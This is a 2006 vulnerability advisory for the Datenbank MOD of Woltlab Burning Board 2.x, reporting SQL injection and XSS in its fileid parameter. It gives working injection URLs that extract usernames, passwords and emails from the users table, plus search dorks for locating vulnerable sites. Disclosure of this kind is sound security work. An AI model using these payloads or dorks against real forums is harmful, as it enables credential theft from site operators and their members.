Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple Vulnerabilities.
--Security Report--
Advisory: Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple
Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 01/03/06 01:33 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: WbbCoderForum (http://www.wbbcoderforum.de)
Version: Datenbank MOD 2.7 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
fileid parameter in this mod if
magic_quotes_gpc = on, if magic_quotes_gpc off remote attacker can make
malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Critical
MOD Pages: info_db.php , database.php
---
How&Example:
GPC
GET ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
GET ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
with this examples remote attacker can leak speficied users login information
from database.
---
Timeline:
* 01/03/2006: Vulnerability found.
* 01/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=17
---
Dorks: inurl:info_db.php , inurl:/wbb2/info_db.php , inurl:/board/info_db.php,
inurl:database.php , inurl:/wbb2/database.php , inurl:/board/database.php
allintext:Datenbank Trooper WbbCoderForum.de etc. etc.
---
Original advisory: http://www.nukedx.com/?viewdoc=17